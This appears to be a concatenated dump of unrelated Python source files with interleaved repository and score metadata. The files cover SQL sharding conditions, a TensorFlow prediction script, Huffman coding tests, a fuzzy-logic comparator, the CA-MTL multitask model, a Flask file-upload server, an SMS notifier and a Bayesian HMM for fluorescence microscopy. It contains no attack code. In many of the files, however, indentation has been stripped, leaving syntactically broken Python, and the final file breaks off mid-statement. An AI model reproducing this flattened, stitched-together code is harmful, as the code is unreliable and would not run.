from shardingpy.parsing.parser.expressionparser import SQLPlaceholderExpression, SQLTextExpression, SQLNumberExpression
from shardingpy.util.extype import RangeType, Range
from shardingpy.util.strutil import equals_ignore_case
class Column:
def __init__(self, name, table_name):
self.name = name
self.table_name = table_name
def __eq__(self, other):
return other and isinstance(other, Column) and equals_ignore_case(self.name, other.name) and equals_ignore_case(
self.table_name, other.table_name)
def __hash__(self):
        return hash(self.name) + (17 * hash(self.table_name) if self.table_name else 0)
class Condition:
def __init__(self, column, operator, *sql_expressions):
if column:
assert isinstance(column, Column)
if operator:
assert isinstance(operator, ShardingOperator)
self.column = column
self.operator = operator
self._position_index_map = OrderedDict()
self._values = list()
position = 0
for expr in sql_expressions:
if isinstance(expr, SQLPlaceholderExpression):
self._position_index_map[position] = expr.index
elif isinstance(expr, SQLTextExpression):
self._values.append(expr.text)
elif isinstance(expr, SQLNumberExpression):
self._values.append(expr.number)
position += 1
# Deprecated
def get_sharding_value(self, parameters):
condition_values = self.get_condition_values(parameters)
if self.operator in [ShardingOperator.EQUAL, ShardingOperator.IN]:
return ListShardingValue(self.column.table_name, self.column.name, condition_values)
elif self.operator == ShardingOperator.BETWEEN:
            return RangeShardingValue(self.column.table_name, self.column.name,
                                      Range(condition_values[0], RangeType.CLOSED, condition_values[1],
                                            RangeType.CLOSED))
else:
raise UnsupportedOperationException("sharding condition not support :" + self.operator.value)
def get_condition_values(self, parameters):
result = self._values[:]
for position, param_index in self._position_index_map.items():
parameter = parameters[param_index]
if position < len(result):
result.insert(position, parameter)
else:
result.append(parameter)
return result
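
# Illustrative example (values assumed): a Condition built from
# SQLPlaceholderExpression(0) and SQLNumberExpression(7) stores 7 in
# self._values; get_condition_values([3]) then returns [3, 7], because the
# placeholder is re-inserted at its recorded position 0.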
class AndCondition(object):
def __init__(self):
self.conditions = list()
def get_conditions_map(self):
result = defaultdict(list)
for each in self.conditions:
result[each.column].append(each)
return result
def optimize(self):
result = AndCondition()
result.conditions = [each for each in self.conditions if type(each) == Condition]
if not result.conditions:
result.conditions.append(NullCondition())
return result
class OrCondition(object):
def __init__(self, condition=None):
self.and_conditions = list()
if condition:
self.add(condition)
def add(self, condition):
assert isinstance(condition, Condition)
if len(self.and_conditions) == 0:
self.and_conditions.append(AndCondition())
self.and_conditions[0].conditions.append(condition)
def find(self, column, index):
pass
class Conditions:
def __init__(self, conditions=None):
self.or_condition = OrCondition()
if conditions:
self.or_condition.and_conditions.extend(conditions.or_condition.and_conditions)
def add(self, condition, sharding_rule):
if sharding_rule.is_sharding_column(condition.column):
self.or_condition.add(condition)
class NullCondition(Condition):
def __init__(self):
super().__init__(None, None)
class GeneratedKeyCondition(Condition):
def __init__(self, column, index, value):
super().__init__(column, ShardingOperator.EQUAL, SQLNumberExpression(value))
self.index = index
self.value = value
def get_condition_values(self, parameters):
return [self.value] if self.value is not None else [parameters[self.index]]
| 2.265625 | 2 |
predict.py | Muxxs/SocialModel | 0 | 12798010 | <filename>predict.py
# coding=utf-8
import tensorflow as tf
import random
def get_data(nums):
    # Build `nums` rows of four pseudo-random features, each in 0.0..9.0.
    x_train = []  # nums rows * 4 features
    for i in range(nums):
        row = [random.random() // 0.1 for _ in range(4)]
        x_train.append(row)
    return x_train
x_train = get_data(10)
x_train.append([1, 1, 1, 1])
x_train.append([2, 2, 2, 2])
model = tf.keras.models.load_model('my_model')
r = model.predict(x_train)
for i in range(len(r)):
print(x_train[i][0] + x_train[i][1] + x_train[i][2] + x_train[i][3],
int(x_train[i][0] + x_train[i][1] + x_train[i][2] + x_train[i][3] > 20), int(r[i][0] < r[i][1]), r[i][0],
r[i][1])
| 2.828125 | 3 |
wowheadquesttracker/helix.py | LairdStreak/MyPyPlayGround | 0 | 12798011 | <gh_stars>0
# Python program to draw
# Spiral Helix Pattern
# using Turtle Programming
import turtle
loadWindow = turtle.Screen()
turtle.speed(2)
for i in range(100):
turtle.circle(5*i)
turtle.circle(-5*i)
turtle.left(i)
turtle.exitonclick() | 3.90625 | 4 |
test/test_huffman.py | fat-crocodile/comression | 1 | 12798012 | import sys
sys.path.insert(0, '../src')
from prefix_code import Encoder, Decoder
from huffman import make_code_symbols as make_code
from bounded_huffman import make_code_symbols as make_ll_code # ll for lenght-limited
class DummyInputStream(object):
def __init__(self, data):
self.data = iter(data)
def get_be(self, n):
res = 0
for _ in xrange(n):
b = self.data.next()
res *= 2
if b == '1': res += 1
elif b == '0': pass
else: raise Exception('Wrong input format')
return res
class DummyOutputStream(object):
def __init__(self):
self.buffer = []
def put_be(self, v, n):
res = []
for _ in xrange(n):
res.append('1' if v % 2 else '0')
v /= 2
res.reverse()
self.buffer.extend(res)
def display_char(c):
code = ord(c)
if c == '\n': return '\\n'
if c == '\t': return '\\t'
if c == '\r': return '\\r'
if c == ' ': return "' '"
if code > 32 and code < 128:
return c
return '0x%02x' % code
def display_list(l):
columns = 4
items = ['%s --> %3s' % (display_char(c), i) for c,i in l if i > 0]
rows = [[] for _ in range((len(items) + columns - 1) / columns)]
try:
ii = iter(items)
while True:
for r in rows:
r.append(ii.next())
except StopIteration:
pass
res = ['\t'.join(r) for r in rows]
return '\n'.join(res)
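
# Worked example of the fill above (items assumed): 5 printable items in 4
# columns give 2 rows, filled down each column first:
#     a -->   1	c -->   3	e -->   5
#     b -->   2	d -->   4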
def test_coder(name, data, code):
encoder = Encoder(code)
dos = DummyOutputStream()
for x in data:
encoder.put(dos, x)
print name
print ''.join(dos.buffer)
print len(dos.buffer)
dis = DummyInputStream(dos.buffer)
decoder = Decoder(code)
res = []
try:
while True:
res.append(decoder.get(dis))
except StopIteration:
pass
if ''.join(res) == data:
print 'Decoded'
else:
print 'Error!'
data = sys.stdin.read()
counts = dict.fromkeys([chr(i) for i in range(256)], 0)
for x in data:
counts[x] += 1
counts = sorted(counts.iteritems())
print 'Counts:\n%s' % display_list(counts)
symbols = sum((c for _,c in counts), 0)
weights = [c * 1.0 / symbols for _,c in counts]
codeu = make_code(counts)
code16 = make_ll_code(counts, 16)
code10 = make_ll_code(counts, 10)
code8 = make_ll_code(counts, 8)
code6 = make_ll_code(counts, 6)
print 'Unlimited code (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, codeu)), 0), display_list(codeu))
print 'code-16 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code16)), 0), display_list(code16))
print 'code-10 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code10)), 0), display_list(code10))
print 'code-8 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code8)), 0), display_list(code8))
print 'code-6 (weighted lenght %s):\n%s' % (sum((w * l for w,(_,l) in zip(weights, code6)), 0), display_list(code6))
test_coder('unlimited', data, codeu)
test_coder('code-16', data, code16)
test_coder('code-10', data, code10)
test_coder('code-8', data, code8)
test_coder('code-6', data, code6)
| 2.796875 | 3 |
robotice/utils/extensions/comparators/fuzzy/base.py | robotice/robotice | 2 | 12798013 |
import re
import logging
from time import time
from datetime import datetime
from celery.task import task
from celery.execute import send_task
from celery.signals import celeryd_after_setup
from robotice.reactor.tasks import commit_action
from robotice.reasoner.comparators import BaseComparator
logger = logging.getLogger(__name__)
R_FCL_PATH = "/srv/robotice/config/fuzzy"
FCL_VAR = "fcl"
class FuzzyComparator(BaseComparator):
"""Object for handling fuzzy reasoning
"""
def compare(self):
for actuator in self.config.actuators:
system = actuator.get('system_name').replace(".", "_")
plan_name = actuator["plan_name"]
fcl_file = actuator.get(FCL_VAR, None)
if not fcl_file:
                logger.info("Actuator has no FCL set specified; it will be ignored.")
continue
model_value, real_value = self.get_values(actuator)
logger.info("key: {0} model_value: {1} | real_value: {2}".format(
('%s.%s.%s' % (system, 'sensors', plan_name)), model_value, real_value))
"""
if real_value == None:
logger.info('NO REAL DATA to COMPARE')
missing_data += 1
continue
"""
# try load pyfuzzy
try:
import fuzzy.storage.fcl.Reader
except Exception, e:
logger.error("Missing pyfuzzy library. Maybe pip install pyfuzzy fix this issue. Original exception: {0}".format(e))
raise e # cannot continue
# load FCL file
fcl_file = ".".join([fcl_file, "fcl"])
fcl_path = "/".join([R_FCL_PATH, fcl_file])
try:
fuzy_system = fuzzy.storage.fcl.Reader.Reader().load_from_file(fcl_path)
except Exception, e:
logger.warning("Cannot load FCL file {0} in {1} path.".format(fcl_file, fcl_path))
# process FCL and get action
logger.info("Ready to FCL calculate")
try:
inputs = {
"input": real_value,
}
output = {
"action": 0.0
}
action = fuzy_system.calculate(inputs, output)["action"]
logger.info(action)
except Exception, e:
raise e
"""
actuator_device = self.config.get_actuator_device(actuator)
logger.info(actuator_device)
actuator.update(actuator_device)
logger.info(actuator)
"""
        return "Fuzzy comparator emitted 0 actions." | 2.1875 | 2 |
src/model/ca_mtl.py | Daupler/CA-MTL | 0 | 12798014 | import re
import logging
from dataclasses import dataclass, field
from typing import List, Optional
import torch
import torch.nn as nn
from transformers import BertPreTrainedModel
from src.model.decoder import Decoder
from src.model.encoders.bert import _BertEncoder
from src.model.encoders.ca_mtl_base import CaMtlBaseEncoder
from src.model.encoders.ca_mtl_large import CaMtlLargeEncoder
logger = logging.getLogger(__name__)
@dataclass
class CaMtlArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
        metadata={
            "help": "Path to pretrained model or model identifier from: CA-MTL-base, CA-MTL-large, bert-base-cased, "
            "bert-base-uncased, bert-large-cased, bert-large-uncased"
}
)
encoder_type: str = field(
default=None,
        metadata={
            "help": "Identifier of encoder-type to use: CA-MTL-base, CA-MTL-large, bert-base-cased, "
"bert-base-uncased, bert-large-cased, bert-large-uncased"
}
)
class CaMtl(BertPreTrainedModel):
def __init__(
self,
config,
model_args,
data_args,
):
super().__init__(config)
self.data_args = data_args
self.bert = self._create_encoder(model_args.encoder_type)
self.decoders = nn.ModuleList()
for task in data_args.tasks:
self.decoders.append(Decoder(config.hidden_size, task))
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
task_id=None,
span_locs=None,
sample_id=None,
):
outputs = self.bert(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
task_id=task_id,
)
sequence_output, pooled_output = outputs[:2]
loss_list = []
unique_task_ids = torch.unique(task_id)
unique_task_ids_list = (
unique_task_ids.cpu().numpy()
if unique_task_ids.is_cuda
else unique_task_ids.numpy()
)
loss_grouped_per_task = (
torch.zeros_like(task_id[0]).repeat(len(self.data_args.tasks)).float()
)
batch_entropy_per_task = torch.zeros(input_ids.shape[0])
batch_entropy_mean_per_task = torch.zeros(input_ids.shape[0])
max_mean_batch_entropy = None
logits = None
for unique_task_id in unique_task_ids_list:
task_id_filter = task_id == unique_task_id
decoder_id = unique_task_id
logits, current_loss, batch_entropy = self.decoders[decoder_id].forward(
sequence_output[task_id_filter],
pooled_output[task_id_filter],
labels=None if labels is None else labels[task_id_filter],
attention_mask=attention_mask[task_id_filter],
)
batch_entropy_mean = batch_entropy.mean().item()
batch_entropy_per_task[task_id_filter] = batch_entropy
batch_entropy_mean_per_task[task_id_filter] = torch.full_like(
batch_entropy, batch_entropy_mean
)
if (
max_mean_batch_entropy is None
or batch_entropy_mean > max_mean_batch_entropy
):
max_mean_batch_entropy = batch_entropy_mean
if labels is not None:
loss_grouped_per_task[unique_task_id] = current_loss
loss_list.append(current_loss)
outputs = (
(logits,)
+ outputs[2:]
+ (
batch_entropy_per_task,
batch_entropy_mean_per_task,
max_mean_batch_entropy,
)
)
if loss_list:
loss = torch.stack(loss_list)
outputs = (loss.mean(),) + outputs + (loss_grouped_per_task.view(1, -1),)
return outputs
def _create_encoder(self, encoder_type):
if encoder_type == "CA-MTL-large":
return CaMtlLargeEncoder(self.config, data_args=self.data_args)
elif encoder_type == "CA-MTL-base":
return CaMtlBaseEncoder(self.config, data_args=self.data_args)
elif encoder_type == "CA-MTL-base-uncased":
return CaMtlBaseEncoder(self.config, data_args=self.data_args)
elif encoder_type == "CA-MTL-tiny":
return CaMtlBaseEncoder(self.config, data_args=self.data_args)
else:
return _BertEncoder(self.config)
@staticmethod
def get_base_model(model_name_or_path):
if model_name_or_path == "CA-MTL-large":
return "bert-large-cased"
elif model_name_or_path == "CA-MTL-base":
return "bert-base-cased"
elif model_name_or_path == "CA-MTL-base-uncased":
return "bert-base-uncased"
elif model_name_or_path == "CA-MTL-tiny":
return 'huawei-noah/TinyBERT_General_6L_768D'
else:
return model_name_or_path
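
# Illustrative mapping from get_base_model above:
#
#     CaMtl.get_base_model("CA-MTL-large")   # -> "bert-large-cased"
#     CaMtl.get_base_model("CA-MTL-tiny")    # -> "huawei-noah/TinyBERT_General_6L_768D"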
| 2.296875 | 2 |
src/server.py | dashaomai/wx_social_server | 0 | 12798015 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from flask import Flask, request, redirect, url_for
from writer import parse_sns
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = set(['json'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/social/moment', methods=['GET', 'POST'])
def update_file():
if request.method == 'POST':
if 'file' not in request.files:
print('No file part')
return redirect(request.url)
file = request.files['file']
if file.filename == '':
print('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
path = os.path.join(app.config['UPLOAD_FOLDER'], 'exported_sns.json')
            file.save(path)
parse_sns(path)
return '<!doctype html><title>File uploaded</title><h1>File uploaded</h1>'
else:
        # include a minimal form so the GET page can actually submit a file
        return '''
        <!doctype html>
        <title>Upload new File</title>
        <h1>Upload new File</h1>
        <form method=post enctype=multipart/form-data>
          <input type=file name=file>
          <input type=submit value=Upload>
        </form>
        '''
app.run(host="0.0.0.0")
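
# Example upload from a client (Flask's default port 5000 assumed):
#
#     curl -F 'file=@exported_sns.json' http://localhost:5000/social/moment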
| 2.578125 | 3 |
src/setting.py | willyii/CarND-Advanced-Lane-Lines | 0 | 12798016 | <reponame>willyii/CarND-Advanced-Lane-Lines<gh_stars>0
CALIBRATION_PATH = "./param/calibration_param.npz"
| 1.1875 | 1 |
modules/configure/call_server.py | Forcepoint/fp-bd-secure-xmas | 0 | 12798017 | import os
from colorama import Fore, init
# Current file directory details
file = os.path.realpath(__file__)
filedir = os.path.dirname(file)
parentdir = os.path.dirname(filedir)
# Initialise colors for terminal
init()
# Print out header
print(Fore.CYAN + '-' * 13 + Fore.RESET)
print('Call Server')
print(Fore.CYAN + '-' * 13 + Fore.RESET)
# Get variables
print()
print(Fore.CYAN + 'What is the root FQDN for this machine: ' + Fore.RESET, end='')
root_url = input()
print(Fore.CYAN + 'On which port should the call server run: ' + Fore.RESET, end='')
port = input()
# Write out configuration file
print()
print(Fore.CYAN + 'Writing Call Server configuration...' + Fore.RESET)
with open(parentdir + '\\settings.py', 'a+') as f:
    f.write('# CALL SERVER SETTINGS\n')
    # str.lstrip strips a set of characters, not a prefix, so drop the scheme explicitly
    cleaned_url = root_url.rstrip('/')
    for prefix in ('https://', 'http://'):
        if cleaned_url.startswith(prefix):
            cleaned_url = cleaned_url[len(prefix):]
    f.write('ROOT_URL=\'%s\'\n' % cleaned_url)
    f.write('PORT=%s\n\n' % port)
print()
print(Fore.GREEN + 'Call Server configuration successfully written!' + Fore.RESET)
print()
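
# With example answers "https://calls.example.com/" and "8080" (hypothetical),
# the block appended to settings.py reads:
#
#     # CALL SERVER SETTINGS
#     ROOT_URL='calls.example.com'
#     PORT=8080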
| 2.5 | 2 |
core/app/notification/out/free_carrier_messaging.py | EmixMaxime/mx-home-security | 2 | 12798018 | <reponame>EmixMaxime/mx-home-security
from urllib import parse
import requests
from notification.models import UserFreeCarrier
class FreeCarrierMessaging:
def send_message(self, credential: UserFreeCarrier, message, *args):
if message is None:
return
data = {
'user': credential.free_user,
'pass': credential.free_password,
'msg': message
}
query = parse.urlencode(data)
url = f'https://smsapi.free-mobile.fr/sendmsg?{query}'
res = requests.get(url)
res.raise_for_status()
# free api
# errorcodes = {400: 'Missing Parameter',
# 402: 'Spammer!',
# 403: 'Access Denied',
# 500: 'Server Down'}
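
# Illustrative call (credential object assumed to carry free_user/free_password):
#
#     FreeCarrierMessaging().send_message(creds, 'hello from robotice')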
| 2.453125 | 2 |
openstates/openstates-master/openstates/in/utils.py | Jgorsick/Advocacy_Angular | 0 | 12798019 | import requests
def get_with_increasing_timeout(scraper, link, fail=False, kwargs=None):
    # if fail is true, we want to throw an error if we can't
    # access the page we need
    # if it's false, throw a warning and keep going
    kwargs = kwargs or {}  # avoid a mutable default argument
    timeout_length = 2
html = None
while timeout_length < 65 and html is None:
try:
html = scraper.get(link,timeout=timeout_length,**kwargs)
except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout):
old_length = timeout_length
timeout_length **= 2 #this squares the result. awesome.
scraper.logger.debug("Timed out after {now} seconds, increasing to {next} and trying again".format(now=old_length,next=timeout_length))
else:
return html
if fail:
raise AssertionError("Link failed after waiting over a minute, giving up and failing.")
else:
scraper.logger.warning("Link failed after waiting over a minute, giving up and moving on.")
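
# Usage sketch (hypothetical scraper/link; any object with a requests-style
# `.get()` and a `.logger` attribute works, e.g. a scrapelib scraper):
#
#   html = get_with_increasing_timeout(scraper, 'https://example.gov/bills',
#                                      fail=True, kwargs={'verify': False})
#   if html is not None:
#       parse(html.text)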
| 3.328125 | 3 |
src/guess_combinator_test.py | RasPat1/wordle-world-whirl | 0 | 12798020 | import unittest
from filter import Filter
from differ import Differ
from guess_combinator import GuessCombinator
class TestGuessCombinator(unittest.TestCase):
def test_it_exists(self):
self.assertNotEqual(GuessCombinator(), None)
def test_it_returns_a_best_guess(self):
        # solution unknown
        corpus = ["abcde", "abcdf", "abcdg", "abcdh", "abcdi", "efghi"]
        expected_best_guess_pair = ["abcde", "efghi"]  # illustrative only; not asserted against below
        # I can't construct good examples.
        self.assertNotEqual(GuessCombinator.process(corpus, corpus), None)
if __name__ == '__main__':
unittest.main()
| 3.078125 | 3 |
tapqir/models/hmm.py | gelles-brandeis/tapqir | 2 | 12798021 | # Copyright Contributors to the Tapqir project.
# SPDX-License-Identifier: Apache-2.0
"""
hmm
^^^
"""
import math
from typing import Union
import torch
import torch.distributions.constraints as constraints
from pyro.distributions.hmm import _logmatmulexp
from pyro.ops.indexing import Vindex
from pyroapi import distributions as dist
from pyroapi import handlers, infer, pyro
from torch.nn.functional import one_hot
from tapqir.distributions import KSMOGN, AffineBeta
from tapqir.distributions.util import expand_offtarget, probs_m, probs_theta
from tapqir.models.cosmos import Cosmos
class HMM(Cosmos):
r"""
**Single-Color Hidden Markov Colocalization Model**
.. note::
This model is used for kinetic simulations. Efficient fitting is not yet supported.
**Reference**:
1. <NAME>, <NAME>, <NAME>, Theobald DL.
Bayesian machine learning analysis of single-molecule fluorescence colocalization images.
bioRxiv. 2021 Oct. doi: `10.1101/2021.09.30.462536 <https://doi.org/10.1101/2021.09.30.462536>`_.
:param S: Number of distinct molecular states for the binder molecules.
:param K: Maximum number of spots that can be present in a single image.
:param channels: Number of color channels.
:param device: Computation device (cpu or gpu).
:param dtype: Floating point precision.
:param use_pykeops: Use pykeops as backend to marginalize out offset.
:param vectorized: Vectorize time-dimension.
"""
name = "hmm"
def __init__(
self,
S: int = 1,
K: int = 2,
channels: Union[tuple, list] = (0,),
device: str = "cpu",
dtype: str = "double",
use_pykeops: bool = True,
vectorized: bool = False,
):
self.vectorized = vectorized
super().__init__(S, K, channels, device, dtype, use_pykeops)
self.conv_params = ["-ELBO", "proximity_loc", "gain_loc", "lamda_loc"]
self._global_params = ["gain", "proximity", "lamda", "trans"]
def model(self):
"""
**Generative Model**
"""
# global parameters
gain = pyro.sample("gain", dist.HalfNormal(50))
init = pyro.sample(
"init", dist.Dirichlet(torch.ones(self.S + 1) / (self.S + 1))
)
init = expand_offtarget(init)
trans = pyro.sample(
"trans",
dist.Dirichlet(torch.ones(self.S + 1, self.S + 1) / (self.S + 1)).to_event(
1
),
)
trans = expand_offtarget(trans)
lamda = pyro.sample("lamda", dist.Exponential(1))
proximity = pyro.sample("proximity", dist.Exponential(1))
size = torch.stack(
(
torch.full_like(proximity, 2.0),
(((self.data.P + 1) / (2 * proximity)) ** 2 - 1),
),
dim=-1,
)
# spots
spots = pyro.plate("spots", self.K)
# aoi sites
aois = pyro.plate(
"aois",
self.data.Nt,
subsample=self.n,
subsample_size=self.nbatch_size,
dim=-2,
)
# time frames
frames = (
pyro.vectorized_markov(name="frames", size=self.data.F, dim=-1)
if self.vectorized
else pyro.markov(range(self.data.F))
)
with aois as ndx:
ndx = ndx[:, None]
# background mean and std
background_mean = pyro.sample("background_mean", dist.HalfNormal(1000))
background_std = pyro.sample("background_std", dist.HalfNormal(100))
z_prev = None
for fdx in frames:
if self.vectorized:
fsx, fdx = fdx
else:
fsx = fdx
# fetch data
obs, target_locs, is_ontarget = self.data.fetch(ndx, fdx, self.cdx)
# sample background intensity
background = pyro.sample(
f"background_{fdx}",
dist.Gamma(
(background_mean / background_std) ** 2,
background_mean / background_std ** 2,
),
)
# sample hidden model state (1+S,)
z_probs = (
Vindex(init)[..., :, is_ontarget.long()]
if isinstance(fdx, int) and fdx < 1
else Vindex(trans)[..., z_prev, :, is_ontarget.long()]
)
z_curr = pyro.sample(f"z_{fsx}", dist.Categorical(z_probs))
theta = pyro.sample(
f"theta_{fdx}",
dist.Categorical(
Vindex(probs_theta(self.K, self.device))[
torch.clamp(z_curr, min=0, max=1)
]
),
infer={"enumerate": "parallel"},
)
onehot_theta = one_hot(theta, num_classes=1 + self.K)
ms, heights, widths, xs, ys = [], [], [], [], []
for kdx in spots:
specific = onehot_theta[..., 1 + kdx]
# spot presence
m = pyro.sample(
f"m_{kdx}_{fsx}",
dist.Bernoulli(Vindex(probs_m(lamda, self.K))[..., theta, kdx]),
)
with handlers.mask(mask=m > 0):
# sample spot variables
height = pyro.sample(
f"height_{kdx}_{fsx}",
dist.HalfNormal(10000),
)
width = pyro.sample(
f"width_{kdx}_{fsx}",
AffineBeta(
1.5,
2,
0.75,
2.25,
),
)
x = pyro.sample(
f"x_{kdx}_{fsx}",
AffineBeta(
0,
Vindex(size)[..., specific],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
y = pyro.sample(
f"y_{kdx}_{fsx}",
AffineBeta(
0,
Vindex(size)[..., specific],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
# append
ms.append(m)
heights.append(height)
widths.append(width)
xs.append(x)
ys.append(y)
# observed data
pyro.sample(
f"data_{fsx}",
KSMOGN(
torch.stack(heights, -1),
torch.stack(widths, -1),
torch.stack(xs, -1),
torch.stack(ys, -1),
target_locs,
background,
gain,
self.data.offset.samples,
self.data.offset.logits.to(self.dtype),
self.data.P,
torch.stack(torch.broadcast_tensors(*ms), -1),
self.use_pykeops,
),
obs=obs,
)
z_prev = z_curr
def guide(self):
"""
**Variational Distribution**
"""
# global parameters
pyro.sample(
"gain",
dist.Gamma(
pyro.param("gain_loc") * pyro.param("gain_beta"),
pyro.param("gain_beta"),
),
)
pyro.sample(
"init", dist.Dirichlet(pyro.param("init_mean") * pyro.param("init_size"))
)
pyro.sample(
"trans",
dist.Dirichlet(
pyro.param("trans_mean") * pyro.param("trans_size")
).to_event(1),
)
pyro.sample(
"lamda",
dist.Gamma(
pyro.param("lamda_loc") * pyro.param("lamda_beta"),
pyro.param("lamda_beta"),
),
)
pyro.sample(
"proximity",
AffineBeta(
pyro.param("proximity_loc"),
pyro.param("proximity_size"),
0,
(self.data.P + 1) / math.sqrt(12),
),
)
# spots
spots = pyro.plate("spots", self.K)
# aoi sites
aois = pyro.plate(
"aois",
self.data.Nt,
subsample=self.n,
subsample_size=self.nbatch_size,
dim=-2,
)
# time frames
frames = (
pyro.vectorized_markov(name="frames", size=self.data.F, dim=-1)
if self.vectorized
else pyro.markov(range(self.data.F))
)
with aois as ndx:
ndx = ndx[:, None]
pyro.sample(
"background_mean",
dist.Delta(Vindex(pyro.param("background_mean_loc"))[ndx, 0]),
)
pyro.sample(
"background_std",
dist.Delta(Vindex(pyro.param("background_std_loc"))[ndx, 0]),
)
z_prev = None
for fdx in frames:
if self.vectorized:
fsx, fdx = fdx
else:
fsx = fdx
# sample background intensity
pyro.sample(
f"background_{fsx}",
dist.Gamma(
Vindex(pyro.param("b_loc"))[ndx, fdx]
* Vindex(pyro.param("b_beta"))[ndx, fdx],
Vindex(pyro.param("b_beta"))[ndx, fdx],
),
)
# sample hidden model state (3,1,1,1)
z_probs = (
Vindex(pyro.param("z_trans"))[ndx, fdx, 0]
if isinstance(fdx, int) and fdx < 1
else Vindex(pyro.param("z_trans"))[ndx, fdx, z_prev]
)
z_curr = pyro.sample(
f"z_{fsx}",
dist.Categorical(z_probs),
infer={"enumerate": "parallel"},
)
for kdx in spots:
# spot presence
m_probs = Vindex(pyro.param("m_probs"))[z_curr, kdx, ndx, fdx]
m = pyro.sample(
f"m_{kdx}_{fsx}",
dist.Categorical(m_probs),
infer={"enumerate": "parallel"},
)
with handlers.mask(mask=m > 0):
# sample spot variables
pyro.sample(
f"height_{kdx}_{fsx}",
dist.Gamma(
Vindex(pyro.param("h_loc"))[kdx, ndx, fdx]
* Vindex(pyro.param("h_beta"))[kdx, ndx, fdx],
Vindex(pyro.param("h_beta"))[kdx, ndx, fdx],
),
)
pyro.sample(
f"width_{kdx}_{fsx}",
AffineBeta(
Vindex(pyro.param("w_mean"))[kdx, ndx, fdx],
Vindex(pyro.param("w_size"))[kdx, ndx, fdx],
0.75,
2.25,
),
)
pyro.sample(
f"x_{kdx}_{fsx}",
AffineBeta(
Vindex(pyro.param("x_mean"))[kdx, ndx, fdx],
Vindex(pyro.param("size"))[kdx, ndx, fdx],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
pyro.sample(
f"y_{kdx}_{fsx}",
AffineBeta(
Vindex(pyro.param("y_mean"))[kdx, ndx, fdx],
Vindex(pyro.param("size"))[kdx, ndx, fdx],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
z_prev = z_curr
def init_parameters(self):
"""
Initialize variational parameters.
"""
device = self.device
data = self.data
pyro.param(
"proximity_loc",
lambda: torch.tensor(0.5, device=device),
constraint=constraints.interval(
0,
(self.data.P + 1) / math.sqrt(12) - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"proximity_size",
lambda: torch.tensor(100, device=device),
constraint=constraints.greater_than(2.0),
)
pyro.param(
"lamda_loc",
lambda: torch.tensor(0.5, device=device),
constraint=constraints.positive,
)
pyro.param(
"lamda_beta",
lambda: torch.tensor(100, device=device),
constraint=constraints.positive,
)
pyro.param(
"init_mean",
lambda: torch.ones(self.S + 1, device=device),
constraint=constraints.simplex,
)
pyro.param(
"init_size",
lambda: torch.tensor(2, device=device),
constraint=constraints.positive,
)
pyro.param(
"trans_mean",
lambda: torch.ones(self.S + 1, self.S + 1, device=device),
constraint=constraints.simplex,
)
pyro.param(
"trans_size",
lambda: torch.full((self.S + 1, 1), 2, device=device),
constraint=constraints.positive,
)
pyro.param(
"gain_loc",
lambda: torch.tensor(5, device=device),
constraint=constraints.positive,
)
pyro.param(
"gain_beta",
lambda: torch.tensor(100, device=device),
constraint=constraints.positive,
)
pyro.param(
"background_mean_loc",
lambda: torch.full(
(data.Nt, 1),
data.median - self.data.offset.mean,
device=device,
),
constraint=constraints.positive,
)
pyro.param(
"background_std_loc",
lambda: torch.ones(data.Nt, 1, device=device),
constraint=constraints.positive,
)
pyro.param(
"b_loc",
lambda: torch.full(
(data.Nt, data.F),
data.median - self.data.offset.mean,
device=device,
),
constraint=constraints.positive,
)
pyro.param(
"b_beta",
lambda: torch.ones(data.Nt, data.F, device=device),
constraint=constraints.positive,
)
pyro.param(
"h_loc",
lambda: torch.full((self.K, data.Nt, data.F), 2000, device=device),
constraint=constraints.positive,
)
pyro.param(
"h_beta",
lambda: torch.full((self.K, data.Nt, data.F), 0.001, device=device),
constraint=constraints.positive,
)
pyro.param(
"w_mean",
lambda: torch.full((self.K, data.Nt, data.F), 1.5, device=device),
constraint=constraints.interval(
0.75 + torch.finfo(self.dtype).eps,
2.25 - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"w_size",
lambda: torch.full((self.K, data.Nt, data.F), 100, device=device),
constraint=constraints.greater_than(2.0),
)
pyro.param(
"x_mean",
lambda: torch.zeros(self.K, data.Nt, data.F, device=device),
constraint=constraints.interval(
-(data.P + 1) / 2 + torch.finfo(self.dtype).eps,
(data.P + 1) / 2 - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"y_mean",
lambda: torch.zeros(self.K, data.Nt, data.F, device=device),
constraint=constraints.interval(
-(data.P + 1) / 2 + torch.finfo(self.dtype).eps,
(data.P + 1) / 2 - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"size",
lambda: torch.full((self.K, data.Nt, data.F), 200, device=device),
constraint=constraints.greater_than(2.0),
)
# classification
pyro.param(
"z_trans",
lambda: torch.ones(
data.Nt,
data.F,
1 + self.S,
1 + self.S,
device=device,
),
constraint=constraints.simplex,
)
pyro.param(
"m_probs",
lambda: torch.full(
(1 + self.S, self.K, self.data.Nt, self.data.F),
0.5,
device=device,
),
constraint=constraints.unit_interval,
)
def TraceELBO(self, jit=False):
"""
A trace implementation of ELBO-based SVI that supports - exhaustive enumeration over
discrete sample sites, and - local parallel sampling over any sample site in the guide.
"""
if self.vectorized:
return (
